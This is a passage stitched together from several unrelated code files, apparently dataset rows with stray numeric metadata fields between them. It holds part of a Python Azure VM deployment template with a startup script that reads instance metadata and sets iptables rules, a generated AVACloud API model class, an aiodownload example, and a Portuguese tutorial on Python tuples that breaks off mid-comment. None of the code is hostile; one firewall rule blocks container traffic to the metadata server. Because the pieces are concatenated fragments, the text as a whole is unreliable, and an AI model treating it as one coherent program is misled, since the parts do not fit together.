curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-02-01&format=text" | \
base64 --decode | \
jq -r '.run_script' > ./run.sh
nohup /bin/bash run.sh >run.log 2>&1 &
runcmd:
- sh /startup.sh
'''
startup_script = base64.b64encode(startup_script.encode('utf-8')).decode('utf-8')
run_script = f'''
#!/bin/bash
set -x
WORKER_DATA_DISK_NAME="{worker_data_disk_name}"
UNRESERVED_WORKER_DATA_DISK_SIZE_GB="{unreserved_disk_storage_gb}"
# format worker data disk
sudo mkfs.xfs -f -m reflink=1 -n ftype=1 {disk_location}
sudo mkdir -p /mnt/disks/$WORKER_DATA_DISK_NAME
sudo mount -o prjquota {disk_location} /mnt/disks/$WORKER_DATA_DISK_NAME
sudo chmod a+w /mnt/disks/$WORKER_DATA_DISK_NAME
XFS_DEVICE=$(xfs_info /mnt/disks/$WORKER_DATA_DISK_NAME | head -n 1 | awk '{{ print $1 }}' | awk 'BEGIN {{ FS = "=" }}; {{ print $2 }}')
# reconfigure docker to use data disk
sudo service docker stop
sudo mv /var/lib/docker /mnt/disks/$WORKER_DATA_DISK_NAME/docker
sudo ln -s /mnt/disks/$WORKER_DATA_DISK_NAME/docker /var/lib/docker
sudo service docker start
# reconfigure /batch and /logs to use data disk
sudo mkdir -p /mnt/disks/$WORKER_DATA_DISK_NAME/batch/
sudo ln -s /mnt/disks/$WORKER_DATA_DISK_NAME/batch /batch
sudo mkdir -p /mnt/disks/$WORKER_DATA_DISK_NAME/logs/
sudo ln -s /mnt/disks/$WORKER_DATA_DISK_NAME/logs /logs
# Forward syslog logs to Log Analytics Agent
cat >>/etc/rsyslog.d/95-omsagent.conf <<EOF
kern.warning @127.0.0.1:25224
user.warning @127.0.0.1:25224
daemon.warning @127.0.0.1:25224
auth.warning @127.0.0.1:25224
syslog.warning @127.0.0.1:25224
uucp.warning @127.0.0.1:25224
authpriv.warning @127.0.0.1:25224
ftp.warning @127.0.0.1:25224
cron.warning @127.0.0.1:25224
local0.warning @127.0.0.1:25224
local1.warning @127.0.0.1:25224
local2.warning @127.0.0.1:25224
local3.warning @127.0.0.1:25224
local4.warning @127.0.0.1:25224
local5.warning @127.0.0.1:25224
local6.warning @127.0.0.1:25224
local7.warning @127.0.0.1:25224
EOF
sudo service rsyslog restart
sudo mkdir -p /etc/netns
curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-02-01&format=text" | \
base64 --decode > userdata
SUBSCRIPTION_ID=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2021-02-01&format=text")
RESOURCE_GROUP=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2021-02-01&format=text")
LOCATION=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/location?api-version=2021-02-01&format=text")
CORES=$(nproc)
NAMESPACE=$(jq -r '.namespace' userdata)
ACTIVATION_TOKEN=$(jq -r '.activation_token' userdata)
IP_ADDRESS=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/privateIpAddress?api-version=2021-02-01&format=text")
BATCH_LOGS_STORAGE_URI=$(jq -r '.batch_logs_storage_uri' userdata)
INSTANCE_ID=$(jq -r '.instance_id' userdata)
INSTANCE_CONFIG=$(jq -r '.instance_config' userdata)
MAX_IDLE_TIME_MSECS=$(jq -r '.max_idle_time_msecs' userdata)
NAME=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/name?api-version=2021-02-01&format=text")
BATCH_WORKER_IMAGE=$(jq -r '.batch_worker_image' userdata)
DOCKER_ROOT_IMAGE=$(jq -r '.docker_root_image' userdata)
DOCKER_PREFIX=$(jq -r '.docker_prefix' userdata)
INTERNAL_GATEWAY_IP=$(jq -r '.internal_ip' userdata)
# private job network = 172.20.0.0/16
# public job network = 172.21.0.0/16
# [all networks] Rewrite traffic coming from containers to masquerade as the host
iptables --table nat --append POSTROUTING --source 172.20.0.0/15 --jump MASQUERADE
# [public]
# Block public traffic to the metadata server
iptables --append FORWARD --source 172.21.0.0/16 --destination 169.254.169.254 --jump DROP
# But allow the internal gateway
iptables --append FORWARD --destination $INTERNAL_GATEWAY_IP --jump ACCEPT
# And this worker
iptables --append FORWARD --destination $IP_ADDRESS --jump ACCEPT
# Forbid outgoing requests to cluster-internal IP addresses
INTERNET_INTERFACE=eth0
iptables --append FORWARD --out-interface $INTERNET_INTERFACE ! --destination 10.128.0.0/16 --jump ACCEPT
cat >> /etc/hosts <<EOF
$INTERNAL_GATEWAY_IP batch-driver.hail
$INTERNAL_GATEWAY_IP batch.hail
$INTERNAL_GATEWAY_IP internal.hail
EOF
{make_global_config_str}
# retry once
az acr login --name $RESOURCE_GROUP
docker pull $BATCH_WORKER_IMAGE || \
(echo 'pull failed, retrying' && sleep 15 && docker pull $BATCH_WORKER_IMAGE)
BATCH_WORKER_IMAGE_ID=$(docker inspect $BATCH_WORKER_IMAGE --format='{{{{.Id}}}}' | cut -d':' -f2)
# So here I go it's my shot.
docker run \
-e CLOUD=azure \
-e CORES=$CORES \
-e NAME=$NAME \
-e NAMESPACE=$NAMESPACE \
-e ACTIVATION_TOKEN=$ACTIVATION_TOKEN \
-e IP_ADDRESS=$IP_ADDRESS \
-e BATCH_LOGS_STORAGE_URI=$BATCH_LOGS_STORAGE_URI \
-e INSTANCE_ID=$INSTANCE_ID \
-e SUBSCRIPTION_ID=$SUBSCRIPTION_ID \
-e RESOURCE_GROUP=$RESOURCE_GROUP \
-e LOCATION=$LOCATION \
-e DOCKER_PREFIX=$DOCKER_PREFIX \
-e DOCKER_ROOT_IMAGE=$DOCKER_ROOT_IMAGE \
-e INSTANCE_CONFIG=$INSTANCE_CONFIG \
-e MAX_IDLE_TIME_MSECS=$MAX_IDLE_TIME_MSECS \
-e BATCH_WORKER_IMAGE=$BATCH_WORKER_IMAGE \
-e BATCH_WORKER_IMAGE_ID=$BATCH_WORKER_IMAGE_ID \
-e INTERNET_INTERFACE=$INTERNET_INTERFACE \
-e UNRESERVED_WORKER_DATA_DISK_SIZE_GB=$UNRESERVED_WORKER_DATA_DISK_SIZE_GB \
-e INTERNAL_GATEWAY_IP=$INTERNAL_GATEWAY_IP \
-v /var/run/docker.sock:/var/run/docker.sock \
-v /var/run/netns:/var/run/netns:shared \
-v /usr/bin/docker:/usr/bin/docker \
-v /usr/sbin/xfs_quota:/usr/sbin/xfs_quota \
-v /batch:/batch:shared \
-v /logs:/logs \
-v /global-config:/global-config \
-v /gcsfuse:/gcsfuse:shared \
-v /etc/netns:/etc/netns \
-v /sys/fs/cgroup:/sys/fs/cgroup \
--mount type=bind,source=/mnt/disks/$WORKER_DATA_DISK_NAME,target=/host \
--mount type=bind,source=/dev,target=/dev,bind-propagation=rshared \
-p 5000:5000 \
--device $XFS_DEVICE \
--device /dev \
--privileged \
--cap-add SYS_ADMIN \
--security-opt apparmor:unconfined \
--network host \
$BATCH_WORKER_IMAGE \
python3 -u -m batch.worker.worker >worker.log 2>&1
[ $? -eq 0 ] || tail -n 1000 worker.log
while true; do
az vm delete -g $RESOURCE_GROUP -n $NAME --yes
sleep 1
done
'''
user_data = {
'run_script': run_script,
'activation_token': activation_token,
'batch_worker_image': BATCH_WORKER_IMAGE,
'docker_root_image': DOCKER_ROOT_IMAGE,
'docker_prefix': DOCKER_PREFIX,
'namespace': DEFAULT_NAMESPACE,
'internal_ip': INTERNAL_GATEWAY_IP,
'batch_logs_storage_uri': file_store.batch_logs_storage_uri,
'instance_id': file_store.instance_id,
'max_idle_time_msecs': max_idle_time_msecs,
'instance_config': base64.b64encode(json.dumps(instance_config.to_dict()).encode()).decode()
}
user_data_str = base64.b64encode(json.dumps(user_data).encode('utf-8')).decode('utf-8')
tags = {
'namespace': DEFAULT_NAMESPACE,
'batch-worker': '1'
}
vm_config: Dict[str, Any] = {
'apiVersion': '2021-03-01',
'type': 'Microsoft.Compute/virtualMachines',
'name': "[parameters('vmName')]",
'location': "[parameters('location')]",
'identity': {
'type': 'UserAssigned',
'userAssignedIdentities': {
"[resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', parameters('userAssignedIdentityName'))]": {}
}
},
'tags': tags,
'dependsOn': [
"[concat('Microsoft.Network/networkInterfaces/', variables('nicName'))]"
],
'properties': {
'hardwareProfile': {
'vmSize': machine_type
},
'networkProfile': {
'networkInterfaces': [
{
'id': "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]",
'properties': {
'deleteOption': 'Delete'
}
}
]
},
'storageProfile': {
'osDisk': {
'name': "[concat(parameters('vmName'), '-os')]",
'createOption': 'FromImage',
'deleteOption': 'Delete',
'caching': 'ReadOnly',
'managedDisk': {
'storageAccountType': 'Standard_LRS'
}
},
'imageReference': "[parameters('imageReference')]",
'dataDisks': data_disks
},
'osProfile': {
'computerName': "[parameters('vmName')]",
'adminUsername': "[parameters('adminUsername')]",
'customData': "[parameters('startupScript')]",
'linuxConfiguration': {
'disablePasswordAuthentication': True,
'ssh': {
'publicKeys': [
{
'keyData': "[parameters('sshKey')]",
'path': "[concat('/home/', parameters('adminUsername'), '/.ssh/authorized_keys')]"
}
]
}
}
},
'userData': "[parameters('userData')]"
},
'resources': [
{
'apiVersion': '2018-06-01',
'type': 'extensions',
'name': 'OMSExtension',
'location': "[parameters('location')]",
'tags': tags,
'dependsOn': [
"[concat('Microsoft.Compute/virtualMachines/', parameters('vmName'))]"
],
'properties': {
'publisher': 'Microsoft.EnterpriseCloud.Monitoring',
'type': 'OmsAgentForLinux',
'typeHandlerVersion': '1.13',
'autoUpgradeMinorVersion': True,
'settings': {
'workspaceId': "[reference(resourceId('Microsoft.OperationalInsights/workspaces/', parameters('workspaceName')), '2015-03-20').customerId]"
},
'protectedSettings': {
'workspaceKey': "[listKeys(resourceId('Microsoft.OperationalInsights/workspaces/', parameters('workspaceName')), '2015-03-20').primarySharedKey]"
}
}
},
]
}
properties = vm_config['properties']
if preemptible:
properties['priority'] = 'Spot'
properties['evictionPolicy'] = 'Delete'
properties['billingProfile'] = {'maxPrice': max_price if max_price is not None else -1}
else:
properties['priority'] = 'Regular'
return {
'tags': tags,
'properties': {
'mode': 'Incremental',
'parameters': {
'location': {
'value': location
},
'vmName': {
'value': machine_name
},
'sshKey': {
'value': ssh_public_key
},
'subnetId': {
'value': f'/subscriptions/{subscription_id}/resourceGroups/{resource_group}/providers/Microsoft.Network/virtualNetworks/default/subnets/batch-worker-subnet'
},
'adminUsername': {
'value': 'batch-worker'
},
'userAssignedIdentityName': {
'value': 'batch-worker'
},
'startupScript': {
'value': startup_script
},
'userData': {
'value': user_data_str
},
'imageReference': {
'value': {
'id': f'/subscriptions/{subscription_id}/resourceGroups/{resource_group}/providers/'
f'Microsoft.Compute/galleries/{resource_group}_batch/images/batch-worker/versions/0.0.12'
}
},
'workspaceName': {
'value': f'{resource_group}-logs',
}
},
'template': {
'$schema': 'https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#',
'contentVersion': '1.0.0.0',
'parameters': {
'location': {
'type': 'string',
'defaultValue': '[resourceGroup().location]'
},
'vmName': {
'type': 'string'
},
'sshKey': {
'type': 'securestring'
},
'subnetId': {
'type': 'string'
},
'adminUsername': {
'type': 'string',
'defaultValue': 'admin'
},
'userAssignedIdentityName': {
'type': 'string',
'defaultValue': 'batch-worker'
},
'startupScript': {
'type': 'string'
},
'userData': {
'type': 'string'
},
'imageReference': {
'type': 'object',
'defaultValue':
{
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '18.04-LTS',
'version': 'latest'
}
},
'workspaceName': {
'type': 'string'
},
},
'variables': {
'ipName': "[concat(parameters('vmName'), '-ip')]",
'nicName': "[concat(parameters('vmName'), '-nic')]",
'ipconfigName': "[concat(parameters('vmName'), '-ipconfig')]",
},
'resources': [
{
'apiVersion': '2018-01-01',
'type': 'Microsoft.Network/publicIPAddresses',
'name': "[variables('ipName')]",
'location': "[parameters('location')]",
'tags': tags,
'dependsOn': [],
'properties': {
'publicIPAllocationMethod': 'Static'
}
},
{
'apiVersion': '2015-06-15',
'type': 'Microsoft.Network/networkInterfaces',
'name': "[variables('nicName')]",
'location': "[parameters('location')]",
'tags': tags,
'dependsOn': [
"[concat('Microsoft.Network/publicIPAddresses/', variables('ipName'))]"
],
'properties': {
'ipConfigurations': [
{
'name': "[variables('ipconfigName')]",
'properties': {
'publicIPAddress': {
'id': "[resourceId('Microsoft.Network/publicIpAddresses', variables('ipName'))]",
'properties': {
'deleteOption': 'Delete'
}
},
'privateIPAllocationMethod': 'Dynamic',
'subnet': {
'id': "[parameters('subnetId')]"
}
}
}
],
'networkSecurityGroup': {
'id': f'/subscriptions/{subscription_id}/resourceGroups/{resource_group}'
f'/providers/Microsoft.Network/networkSecurityGroups/batch-worker-nsg'
}
}
},
vm_config
],
'outputs': {}
}
}
}
| 19,852 | 0 | 23 |
c976e216d8c906c85552f7ac3a219e05322c54d4 | 7,582 | py | Python | avacloud_client_python/models/stlb_reference_dto.py | Dangl-IT/avacloud-client-python | 66f555096bbbc87d02d02e4e2dfb0c6accb18f95 | [
"RSA-MD"
] | 1 | 2019-01-12T18:10:24.000Z | 2019-01-12T18:10:24.000Z | avacloud_client_python/models/stlb_reference_dto.py | Dangl-IT/avacloud-client-python | 66f555096bbbc87d02d02e4e2dfb0c6accb18f95 | [
"RSA-MD"
] | null | null | null | avacloud_client_python/models/stlb_reference_dto.py | Dangl-IT/avacloud-client-python | 66f555096bbbc87d02d02e4e2dfb0c6accb18f95 | [
"RSA-MD"
] | null | null | null | # coding: utf-8
"""
AVACloud API 1.17.3
AVACloud API specification # noqa: E501
OpenAPI spec version: 1.17.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class STLBReferenceDto(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'version_date': 'datetime',
'catalogue_name': 'str',
'group': 'str',
'cost_group': 'str',
'service_area': 'str',
'keys': 'list[STLBKeyDto]'
}
attribute_map = {
'version_date': 'versionDate',
'catalogue_name': 'catalogueName',
'group': 'group',
'cost_group': 'costGroup',
'service_area': 'serviceArea',
'keys': 'keys'
}
def __init__(self, version_date=None, catalogue_name=None, group=None, cost_group=None, service_area=None, keys=None): # noqa: E501
"""STLBReferenceDto - a model defined in Swagger""" # noqa: E501
self._version_date = None
self._catalogue_name = None
self._group = None
self._cost_group = None
self._service_area = None
self._keys = None
self.discriminator = None
if version_date is not None:
self.version_date = version_date
if catalogue_name is not None:
self.catalogue_name = catalogue_name
if group is not None:
self.group = group
if cost_group is not None:
self.cost_group = cost_group
if service_area is not None:
self.service_area = service_area
if keys is not None:
self.keys = keys
@property
def version_date(self):
"""Gets the version_date of this STLBReferenceDto. # noqa: E501
The date of the STLB version. Typically, only the Year and Month are used # noqa: E501
:return: The version_date of this STLBReferenceDto. # noqa: E501
:rtype: datetime
"""
return self._version_date
@version_date.setter
def version_date(self, version_date):
"""Sets the version_date of this STLBReferenceDto.
The date of the STLB version. Typically, only the Year and Month are used # noqa: E501
:param version_date: The version_date of this STLBReferenceDto. # noqa: E501
:type: datetime
"""
self._version_date = version_date
@property
def catalogue_name(self):
"""Gets the catalogue_name of this STLBReferenceDto. # noqa: E501
The name of the catalogue within the STLB # noqa: E501
:return: The catalogue_name of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._catalogue_name
@catalogue_name.setter
def catalogue_name(self, catalogue_name):
"""Sets the catalogue_name of this STLBReferenceDto.
The name of the catalogue within the STLB # noqa: E501
:param catalogue_name: The catalogue_name of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._catalogue_name = catalogue_name
@property
def group(self):
"""Gets the group of this STLBReferenceDto. # noqa: E501
The name of the group in STLB # noqa: E501
:return: The group of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._group
@group.setter
def group(self, group):
"""Sets the group of this STLBReferenceDto.
The name of the group in STLB # noqa: E501
:param group: The group of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._group = group
@property
def cost_group(self):
"""Gets the cost_group of this STLBReferenceDto. # noqa: E501
The cost group this service is associated with # noqa: E501
:return: The cost_group of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._cost_group
@cost_group.setter
def cost_group(self, cost_group):
"""Sets the cost_group of this STLBReferenceDto.
The cost group this service is associated with # noqa: E501
:param cost_group: The cost_group of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._cost_group = cost_group
@property
def service_area(self):
"""Gets the service_area of this STLBReferenceDto. # noqa: E501
The service area (or type) in the STLB # noqa: E501
:return: The service_area of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._service_area
@service_area.setter
def service_area(self, service_area):
"""Sets the service_area of this STLBReferenceDto.
The service area (or type) in the STLB # noqa: E501
:param service_area: The service_area of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._service_area = service_area
@property
def keys(self):
"""Gets the keys of this STLBReferenceDto. # noqa: E501
These keys may optionally be used to further reference multiple, specific items within the STLB # noqa: E501
:return: The keys of this STLBReferenceDto. # noqa: E501
:rtype: list[STLBKeyDto]
"""
return self._keys
@keys.setter
def keys(self, keys):
"""Sets the keys of this STLBReferenceDto.
These keys may optionally be used to further reference multiple, specific items within the STLB # noqa: E501
:param keys: The keys of this STLBReferenceDto. # noqa: E501
:type: list[STLBKeyDto]
"""
self._keys = keys
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(STLBReferenceDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, STLBReferenceDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 29.387597 | 136 | 0.595489 | # coding: utf-8
"""
AVACloud API 1.17.3
AVACloud API specification # noqa: E501
OpenAPI spec version: 1.17.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class STLBReferenceDto(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'version_date': 'datetime',
'catalogue_name': 'str',
'group': 'str',
'cost_group': 'str',
'service_area': 'str',
'keys': 'list[STLBKeyDto]'
}
attribute_map = {
'version_date': 'versionDate',
'catalogue_name': 'catalogueName',
'group': 'group',
'cost_group': 'costGroup',
'service_area': 'serviceArea',
'keys': 'keys'
}
def __init__(self, version_date=None, catalogue_name=None, group=None, cost_group=None, service_area=None, keys=None): # noqa: E501
"""STLBReferenceDto - a model defined in Swagger""" # noqa: E501
self._version_date = None
self._catalogue_name = None
self._group = None
self._cost_group = None
self._service_area = None
self._keys = None
self.discriminator = None
if version_date is not None:
self.version_date = version_date
if catalogue_name is not None:
self.catalogue_name = catalogue_name
if group is not None:
self.group = group
if cost_group is not None:
self.cost_group = cost_group
if service_area is not None:
self.service_area = service_area
if keys is not None:
self.keys = keys
@property
def version_date(self):
"""Gets the version_date of this STLBReferenceDto. # noqa: E501
The date of the STLB version. Typically, only the Year and Month are used # noqa: E501
:return: The version_date of this STLBReferenceDto. # noqa: E501
:rtype: datetime
"""
return self._version_date
@version_date.setter
def version_date(self, version_date):
"""Sets the version_date of this STLBReferenceDto.
The date of the STLB version. Typically, only the Year and Month are used # noqa: E501
:param version_date: The version_date of this STLBReferenceDto. # noqa: E501
:type: datetime
"""
self._version_date = version_date
@property
def catalogue_name(self):
"""Gets the catalogue_name of this STLBReferenceDto. # noqa: E501
The name of the catalogue within the STLB # noqa: E501
:return: The catalogue_name of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._catalogue_name
@catalogue_name.setter
def catalogue_name(self, catalogue_name):
"""Sets the catalogue_name of this STLBReferenceDto.
The name of the catalogue within the STLB # noqa: E501
:param catalogue_name: The catalogue_name of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._catalogue_name = catalogue_name
@property
def group(self):
"""Gets the group of this STLBReferenceDto. # noqa: E501
The name of the group in STLB # noqa: E501
:return: The group of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._group
@group.setter
def group(self, group):
"""Sets the group of this STLBReferenceDto.
The name of the group in STLB # noqa: E501
:param group: The group of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._group = group
@property
def cost_group(self):
"""Gets the cost_group of this STLBReferenceDto. # noqa: E501
The cost group this service is associated with # noqa: E501
:return: The cost_group of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._cost_group
@cost_group.setter
def cost_group(self, cost_group):
"""Sets the cost_group of this STLBReferenceDto.
The cost group this service is associated with # noqa: E501
:param cost_group: The cost_group of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._cost_group = cost_group
@property
def service_area(self):
"""Gets the service_area of this STLBReferenceDto. # noqa: E501
The service area (or type) in the STLB # noqa: E501
:return: The service_area of this STLBReferenceDto. # noqa: E501
:rtype: str
"""
return self._service_area
@service_area.setter
def service_area(self, service_area):
"""Sets the service_area of this STLBReferenceDto.
The service area (or type) in the STLB # noqa: E501
:param service_area: The service_area of this STLBReferenceDto. # noqa: E501
:type: str
"""
self._service_area = service_area
@property
def keys(self):
"""Gets the keys of this STLBReferenceDto. # noqa: E501
These keys may optionally be used to further reference multiple, specific items within the STLB # noqa: E501
:return: The keys of this STLBReferenceDto. # noqa: E501
:rtype: list[STLBKeyDto]
"""
return self._keys
@keys.setter
def keys(self, keys):
"""Sets the keys of this STLBReferenceDto.
These keys may optionally be used to further reference multiple, specific items within the STLB # noqa: E501
:param keys: The keys of this STLBReferenceDto. # noqa: E501
:type: list[STLBKeyDto]
"""
self._keys = keys
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(STLBReferenceDto, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, STLBReferenceDto):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 0 | 0 | 0 |
d8461cf5c51d4e051e54d79bad3280158598aa60 | 735 | py | Python | aiodownload/example/03_each.py | jelloslinger/aiodownload | 29b3bc49cdaec9615933d326b338865fd903571c | [
"MIT"
] | 10 | 2017-05-25T23:02:00.000Z | 2020-04-04T16:18:56.000Z | aiodownload/example/03_each.py | jelloslinger/aiodownload | 29b3bc49cdaec9615933d326b338865fd903571c | [
"MIT"
] | null | null | null | aiodownload/example/03_each.py | jelloslinger/aiodownload | 29b3bc49cdaec9615933d326b338865fd903571c | [
"MIT"
] | null | null | null | import aiodownload
from aiodownload.example import logger
if __name__ == '__main__':
main()
| 22.272727 | 79 | 0.62585 | import aiodownload
from aiodownload.example import logger
class Example:
def __init__(self, number, flag):
self.number = number
self.flag = flag
def main():
examples = [Example(i, True if i % 2 == 0 else False) for i in range(0, 5)]
url_map = lambda x: 'https://httpbin.org/links/{}'.format(x.number)
for bundle in aiodownload.each(examples, url_map=url_map):
if bundle.info.flag:
logger.info(bundle.status_msg + ' Flag is True')
# Do some type of processing on this bundle
else:
logger.warning(bundle.status_msg + ' Flag is False')
# Do some alternate type of processing on this bundle
if __name__ == '__main__':
main()
| 569 | -7 | 73 |
9869308c3f4a32c54000e48993e39c0f4609d453 | 3,017 | py | Python | ExerciciosPython/aula016.py | MecaFlavio/Exercicios-Python-3-Curso-em-Video | b93272c15b19b04deff73f1b0a684a0b49313edf | [
"MIT"
] | null | null | null | ExerciciosPython/aula016.py | MecaFlavio/Exercicios-Python-3-Curso-em-Video | b93272c15b19b04deff73f1b0a684a0b49313edf | [
"MIT"
] | null | null | null | ExerciciosPython/aula016.py | MecaFlavio/Exercicios-Python-3-Curso-em-Video | b93272c15b19b04deff73f1b0a684a0b49313edf | [
"MIT"
] | null | null | null | # Aula 16 - Vaiaveis compostas: Tuplas
lanche = ('hamburger', 'suco', 'pizza', 'pudim') # tupla criada, pode ser criada sem parenteses np python 3
print(lanche) # mostra a tupla em parenteses e os seus elementos
print(lanche[1]) # mostra o elemento 1 da tupla
print(lanche[-1]) # mostra o elemento -1 da tupla
# Tuplas recebem indices numericos crescentes e decrescentes ex: 0,1,2 e -1,-2,-3 respectivamente
print(lanche[3]) # mostra o elemento 3 da tupla
print(lanche[-2]) # mostra o elemento - 2 da tupla
print(lanche[1:3]) # imprime do elemento 1 ao elemento 2 desconsiderando o elemento 3
print(lanche[2:]) # imprime o elemento 2 até o ultimo
print(lanche[:2]) # imprime do início até o elemento 1 ignorando o elemento 2
print(lanche[-2:]) # imprime do -2 até o final, pizza até pudim
print(lanche[3:-5:-1]) # imprime do elemento 3 ao 0 em ordem decrescente
## lanche[1] = refrigerante # retorna erro, tuplas são imutáveis durante a execução do programa.
print(lanche)
# Percorre o for para cada elemento indexado da Tupla
for comida in lanche:
print(f'Eu vou comer {comida};')
print('Comi pra caramba')
print(len(lanche)) # mostra a quantidade de elementos da tupla
# O range vai de 0 à quantidade de elementos da tupla lanche = (4)
# Por tanto mostra o indice correspondentes de 0 a 3
for cont1 in range(0, 4): # pode ser lido, 'mostre 4 resultados iniciando do 0. 0,1,2,3 = 4 resultados
print(cont1)
for cont in range(0, len(lanche)):
print(lanche[cont])
for cont2 in range(0, len(lanche)):
print(f'Eu vou comer {lanche[cont2]} na posição {cont2}')
# Metodo enumerate retorna uma tupla para cada elemento na tupla lanche
# no primeiro indice ele aloca o número no segundo indice aloca o elemento
# após o for aponto duas variaveis se quiser guadar separadamente
for pos, comida in enumerate(lanche):
print(f'Eu vou comer {comida} na posição {pos}')
# O metoto sorted cria lista com a tupla e organiza em ordem alfabetica
print(sorted(lanche))
a = (2, 5, 4)
b = (5, 8, 1, 2)
c = a + b
# soma de tuplas realiza a comutação de elementos, ou seja, apenas junta os elementos numa terceira tupla
print(c)
# Nesse caso, por tanto, a + b não sera igual b + a.. A ordem da soma influencia em como os elementos serão indexados
c = b + a
print(c)
print(len(c)) # imprime o número de elementos de c
print(c)
print(c.count(5)) # mosta a quantidade de elementos 5 que a tupla possui
print(c.count(4)) # mostra a quantidade de elementos 4 na tupla
print(c.count(9)) # mostra que não possui o elemento
print(c.index(8)) # mostra o indice do elemento
print(c.index(4)) # mostra o indice do elemento
print(c.index(5)) # mostra o indice do elemento, na caso do primeiro encontrado
print(c.index(5, 1)) # mostra o indice do elemento a partir do indice 1
# Uma tupla pode receber elementos de tipos diferentes
pessoa = ('Flavio', 32, 'Casado', 'peso', 110)
print(pessoa)
# É possivel deletar uma tupla durante a execução do programa com o comando del
del lanche
print(lanche)
| 41.902778 | 117 | 0.724892 | # Aula 16 - Vaiaveis compostas: Tuplas
lanche = ('hamburger', 'suco', 'pizza', 'pudim') # tupla criada, pode ser criada sem parenteses np python 3
print(lanche) # mostra a tupla em parenteses e os seus elementos
print(lanche[1]) # mostra o elemento 1 da tupla
print(lanche[-1]) # mostra o elemento -1 da tupla
# Tuplas recebem indices numericos crescentes e decrescentes ex: 0,1,2 e -1,-2,-3 respectivamente
print(lanche[3]) # mostra o elemento 3 da tupla
print(lanche[-2]) # mostra o elemento - 2 da tupla
print(lanche[1:3]) # imprime do elemento 1 ao elemento 2 desconsiderando o elemento 3
print(lanche[2:]) # imprime o elemento 2 até o ultimo
print(lanche[:2]) # imprime do início até o elemento 1 ignorando o elemento 2
print(lanche[-2:]) # imprime do -2 até o final, pizza até pudim
print(lanche[3:-5:-1]) # imprime do elemento 3 ao 0 em ordem decrescente
## lanche[1] = refrigerante # retorna erro, tuplas são imutáveis durante a execução do programa.
print(lanche)
# Percorre o for para cada elemento indexado da Tupla
for comida in lanche:
print(f'Eu vou comer {comida};')
print('Comi pra caramba')
print(len(lanche)) # mostra a quantidade de elementos da tupla
# O range vai de 0 à quantidade de elementos da tupla lanche = (4)
# Por tanto mostra o indice correspondentes de 0 a 3
for cont1 in range(0, 4): # pode ser lido, 'mostre 4 resultados iniciando do 0. 0,1,2,3 = 4 resultados
print(cont1)
for cont in range(0, len(lanche)):
print(lanche[cont])
for cont2 in range(0, len(lanche)):
print(f'Eu vou comer {lanche[cont2]} na posição {cont2}')
# Metodo enumerate retorna uma tupla para cada elemento na tupla lanche
# no primeiro indice ele aloca o número no segundo indice aloca o elemento
